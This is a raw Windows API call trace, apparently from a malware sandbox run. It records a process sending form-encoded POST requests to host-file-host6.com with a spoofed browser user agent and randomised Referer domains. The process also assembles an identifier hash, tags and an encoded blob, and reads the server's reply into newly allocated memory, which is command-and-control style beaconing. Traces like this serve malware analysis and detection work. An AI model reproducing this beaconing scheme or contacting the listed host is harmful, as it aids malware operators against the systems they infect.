RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33f90) returned 0x17 [0135.966] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33f90) returned 1 [0135.966] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33f70) returned 0x12 [0135.966] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33f70) returned 1 [0135.966] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33df0) returned 0x4e [0135.966] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33df0) returned 1 [0135.966] WinHttpAddRequestHeaders (hRequest=0xa105830, pwszHeaders="Accept: */*\r\nReferer: http://muncbh.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0135.966] WinHttpSendRequest (hRequest=0xa105830, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4a33b60*, dwOptionalLength=0xc5, dwTotalLength=0xc5, dwContext=0x0) returned 1 [0136.199] WinHttpReceiveResponse (hRequest=0xa105830, lpReserved=0x0) returned 1 [0136.199] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2800) returned 0x4a33f70 [0136.199] WinHttpReadData (in: hRequest=0xa105830, lpBuffer=0x4a33f70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efc58 | out: lpBuffer=0x4a33f70*, lpdwNumberOfBytesRead=0x101efc58*=0x197) returned 1 [0136.199] RtlReAllocateHeap (Heap=0x4a30000, Flags=0x8, Ptr=0x4a33f70, Size=0x5000) returned 0x4a33f70 [0136.200] WinHttpReadData (in: hRequest=0xa105830, lpBuffer=0x4a34107, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efc58 | out: lpBuffer=0x4a34107*, lpdwNumberOfBytesRead=0x101efc58*=0x0) returned 1 [0136.200] VirtualAlloc (lpAddress=0x0, dwSize=0x197, flAllocationType=0x3000, flProtect=0x4) returned 0x3ee0000 [0136.201] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33f70) returned 1 [0136.201] WinHttpCloseHandle (hInternet=0xa105830) returned 1 [0136.202] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33e50) returned 0x10d [0136.202] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33e50) returned 1 [0136.202] WinHttpCloseHandle (hInternet=0xa2750f0) returned 1 [0136.202] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33d80) returned 0x68 [0136.202] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33d80) returned 1 [0136.203] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33d60) returned 0x12 [0136.203] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33d60) returned 1 [0136.204] WinHttpCloseHandle (hInternet=0xa1b0160) returned 1 [0136.204] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33c40) returned 0x10c [0136.205] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33c40) returned 1 [0136.205] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33ad0) returned 0x7f [0136.205] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33ad0) returned 1 [0136.205] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a33b60) returned 0xce [0136.205] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a33b60) returned 1 [0136.205] VirtualFree (lpAddress=0x3ee0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.206] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a338b0) returned 0x210 [0136.206] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a338b0) returned 1 [0136.207] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a328a0) returned 0x1008 [0136.207] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a328a0) returned 1 [0136.208] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31890) returned 0x1008 [0136.208] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31890) returned 1 [0136.209] VirtualFree (lpAddress=0x3d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xde5068ca [0136.210] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x9e) returned 0x4a31890 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6ae7c442 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8d057c51 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf5aa6c31 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xabcff010 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4a1c9079 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe8e482e8 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdd4771c1 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4d29307e [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5c809308 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc3f78f94 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xae6b1da6 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4d92c99d [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe3e47de8 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5cadae27 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9444f2bb [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x63ad97ef [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfc51b2d8 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbe9710c9 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x64cc2206 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9f9806c3 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa6d95432 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa080c738 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7c935c44 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x934320f9 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xddc8abcb [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7d06b33c [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd22796f1 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdb263f66 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x18646ed0 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8ccf3885 [0136.210] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd7149ac [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8a9423d7 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xccd73304 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x378d48b [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6f72ad87 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa96da84d [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb6e49020 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x53fada60 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa0ec1623 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x99f783ec [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa9c84a1 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcd89be3e [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xda5e5031 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd9cb7e27 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x450053fd [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7efb97a3 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4585c95f [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf90ba6d9 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3c576119 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbfa65350 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x83daa6dd [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb10701a5 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x679b2f88 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x985dac5f [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31c62d91 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7cca112b [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x188fbad3 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa7c79318 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4bc86a91 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x99018588 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd49e3a5c [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf70da187 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31f51f88 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x10b26dcc [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x591397e2 [0136.211] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdf22de90 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf2a54739 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x29c77436 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdb49fd77 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6f14963f [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x28c4beaf [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2d13acf6 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa25cd770 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5d5c6452 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x94f9cc78 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6d8a7769 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa53d3ee7 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe603db9b [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfd62df72 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4397ffb2 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x688bb05a [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x38124c8a [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb5172d05 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x825a6e2e [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf3707356 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7760f773 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc39136b3 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe366d68d [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8f7d7907 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x11842be6 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd6f245e4 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc47b1b15 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x81f06f21 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd861dde1 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf775afca [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7222252a [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1f38d4ab [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7e7568c9 [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe5a4936a [0136.212] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf23c0726 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9d58a336 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2b42a8a8 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x58d76e5e [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa60100fc [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4931ef26 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5dccea9f [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x49b46836 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf95a7071 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6b461033 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3d23e60e [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2a22fafd [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcfff1b1 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2e77ee60 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe0168be8 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x44d4dca1 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf632b591 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x97ca52f6 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4a1d890f [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x52b78438 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf550eb15 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe198b606 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x855c09c3 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1af3124 [0136.213] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1547a475 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf53da249 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf2b5e8a1 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3fd38309 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7ec9d883 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4d9bcd38 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4966799a [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2213167f [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc5a355c5 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6f7d346d [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1584b35f [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2681b19c [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x79e43c4b [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc27fb95 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xec52988b [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x24439adc [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4266565f [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc9446f70 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9712e95c [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x26c64f84 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5a565bab [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x120b9009 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd49b5193 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb352ac21 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x99327773 [0136.214] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb359528 [0136.214] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0xed) returned 0x4a31940 [0136.214] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0136.217] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0136.217] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0136.217] lstrcatA (in: lpString1="", lpString2="MT2%dK.U!y;h_.0Ps`/Ps3wl0gX#7,;hWHVLO#`A*96l0@`j>+@DEPn,*-\"3I\";-q)Xqp\\^Aw7Or*d=EMQ\\m1d$HT#3(`f'#b8O_-I-k90c*4gHvaA\"('lQ,g*E.^THz[?dZ(FSp^*iRi/i$nv^ny" | out: lpString1="MT2%dK.U!y;h_.0Ps`/Ps3wl0gX#7,;hWHVLO#`A*96l0@`j>+@DEPn,*-\"3I\";-q)Xqp\\^Aw7Or*d=EMQ\\m1d$HT#3(`f'#b8O_-I-k90c*4gHvaA\"('lQ,g*E.^THz[?dZ(FSp^*iRi/i$nv^ny") returned="MT2%dK.U!y;h_.0Ps`/Ps3wl0gX#7,;hWHVLO#`A*96l0@`j>+@DEPn,*-\"3I\";-q)Xqp\\^Aw7Or*d=EMQ\\m1d$HT#3(`f'#b8O_-I-k90c*4gHvaA\"('lQ,g*E.^THz[?dZ(FSp^*iRi/i$nv^ny" [0136.217] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10c) returned 0x4a31a40 [0136.217] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0136.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a31840, cbMultiByte=28, lpWideCharStr=0x4a31a40, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0136.217] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x101efc18 | out: pProxyConfig=0x101efc18) returned 1 [0136.222] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa1aec20 [0136.222] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x101efcd0 | out: lpUrlComponents=0x101efcd0) returned 1 [0136.222] WinHttpConnect (hSession=0xa1aec20, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa273e30 [0136.222] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31b60 [0136.222] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x68) returned 0x4a31b80 [0136.222] WinHttpOpenRequest (hConnect=0xa273e30, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa105fb0 [0136.222] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4e) returned 0x4a31bf0 [0136.222] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a31c50 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x20438269 [0136.223] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a31d70 [0136.223] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x17) returned 0x4a31d90 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5367e793 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6f164b0a [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x98f50003 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x901fba22 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x938a5ac4 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc94fa0d9 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x49ca6747 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7079ea90 [0136.223] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6b9df4fd [0136.223] wsprintfW (in: param_1=0x4a31c50, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://dfugmevg.org/") returned 42 [0136.223] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31d90) returned 0x17 [0136.223] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d90) returned 1 [0136.224] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31d70) returned 0x12 [0136.224] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d70) returned 1 [0136.225] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31bf0) returned 0x4e [0136.226] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31bf0) returned 1 [0136.226] WinHttpAddRequestHeaders (hRequest=0xa105fb0, pwszHeaders="Accept: */*\r\nReferer: http://dfugmevg.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0136.226] WinHttpSendRequest (hRequest=0xa105fb0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x4a31940*, dwOptionalLength=0xe4, dwTotalLength=0xe4, dwContext=0x0) returned 1 [0136.982] WinHttpReceiveResponse (hRequest=0xa105fb0, lpReserved=0x0) returned 1 [0136.982] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x2800) returned 0x4a31d70 [0136.982] WinHttpReadData (in: hRequest=0xa105fb0, lpBuffer=0x4a31d70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x101efd88 | out: lpBuffer=0x4a31d70*, lpdwNumberOfBytesRead=0x101efd88*=0x0) returned 1 [0136.983] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31d70) returned 1 [0136.983] WinHttpCloseHandle (hInternet=0xa105fb0) returned 1 [0136.983] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31c50) returned 0x10d [0136.984] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31c50) returned 1 [0136.984] WinHttpCloseHandle (hInternet=0xa273e30) returned 1 [0136.984] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b80) returned 0x68 [0136.984] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b80) returned 1 [0136.985] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31b60) returned 0x12 [0136.985] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31b60) returned 1 [0136.986] WinHttpCloseHandle (hInternet=0xa1aec20) returned 1 [0136.986] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31a40) returned 0x10c [0136.986] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31a40) returned 1 [0136.986] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31890) returned 0x9e [0136.987] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31890) returned 1 [0136.987] RtlSizeHeap (HeapHandle=0x4a30000, Flags=0x0, MemoryPointer=0x4a31940) returned 0xed [0136.987] RtlFreeHeap (HeapHandle=0x4a30000, Flags=0x0, BaseAddress=0x4a31940) returned 1 [0136.988] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x78352945 [0136.989] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x85) returned 0x4a31890 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x69254da5 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3c6d3a63 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7f74031b [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe97c801d [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x424c2841 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb0ef6a9 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdf178063 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x946e100c [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc144cdc4 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x37b4aefb [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x622c9298 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x975fed18 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8429404c [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31672f8f [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe3a24650 [0136.990] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfbcbc553 [0136.990] 